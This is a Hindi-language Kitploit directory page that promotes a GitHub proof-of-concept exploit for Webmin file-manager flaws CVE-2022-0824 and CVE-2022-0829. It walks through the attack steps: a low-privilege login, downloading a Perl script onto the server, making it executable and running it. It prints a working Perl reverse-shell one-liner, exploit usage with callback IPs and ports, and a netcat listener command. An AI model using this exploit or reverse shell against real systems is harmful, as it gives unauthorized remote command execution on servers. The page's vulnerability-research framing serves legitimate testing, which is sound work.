Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WebminRCE-exploit — CVE-2022-0824, CVE-2022-0829, File Manger विशेषाधिकार शोषण | Kitploit
उपकरण/GitHubGitHub/gokul-ramesh/webminrce-exploit
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubgokul-ramesh/webminrce-exploit

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829, File Manger विशेषाधिकार शोषण

रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WebminRCE-शोषण

CVE-2022-0824, CVE-2022-0829 - फ़ाइल प्रबंधक विशेषाधिकार शोषण

इस PoC का परीक्षण करने के लिए कमज़ोर एप्लिकेशन एक डॉकर इमेज के रूप में यहां पाया जा सकता है।
पूर्वापेक्षाएँ:

  • Python3
  • Requests module

विवरण

कमज़ोरी

दूरस्थ कोड निष्पादन के लिए अनुचित पहुँच नियंत्रण सुरक्षित उपयोगकर्ता (अनप्रिविलेज्ड उपयोगकर्ता) फ़ाइल प्रबंधक मॉड्यूल तक पहुँच सकते हैं, जिसे डिफ़ॉल्ट रूप से प्रतिबंधित होना चाहिए।

शोषण पेलोड

वेबमिन सर्वर पर cgi फ़ाइल अपलोड करने के लिए अनुचित पहुँच नियंत्रण कमज़ोरी का उपयोग करें।

चरण 1 (प्रमाणीकरण)

सर्वर पर एक सुरक्षित/कम विशेषाधिकार वाले उपयोगकर्ता के साथ प्रमाणीकरण और लॉगिन करें।

चरण 2 (सर्वर में फ़ाइल डाउनलोड करें)

सर्वर में एक perl स्क्रिप्ट डाउनलोड करने के लिए कमज़ोर फ़ाइल प्रबंधक (/file-manager/http_download.cgi) मॉड्यूल का उपयोग करें।
रिवर्स शेल एक्सेस प्राप्त करने के लिए perl स्क्रिप्ट:
root@kitploit:~
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

चरण 3 (अनुमति संशोधित करें)

फ़ाइल में निष्पादन योग्य अनुमति जोड़ें (/file-manager/chmod.cgi)

चरण 4 (कमांड निष्पादित करें)

बस अपलोड की गई फ़ाइल को कॉल करें ताकि उसमें मौजूद रिवर्स शेल स्क्रिप्ट निष्पादित हो सके।

उपयोग निर्देश:

root@kitploit:~
  $ python3 cve-2022-0824.py --help
  
  usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

उपयोग उदाहरण:

root@kitploit:~
$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
root@kitploit:~
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080

उपयोगकर्ता नाम और पासवर्ड सुरक्षित उपयोगकर्ताओं (गैर-विशेषाधिकार प्राप्त) के लिए हैं। रिवर्स शेल कनेक्शन प्राप्त करने के लिए स्क्रिप्ट चलाने से पहल लिसनर सेट अप करें।

root@kitploit:~
$ nc -lvp <port>

इस शोषण के लिए @faisalfs10x का धन्यवाद।

टूल डाउनलोड करें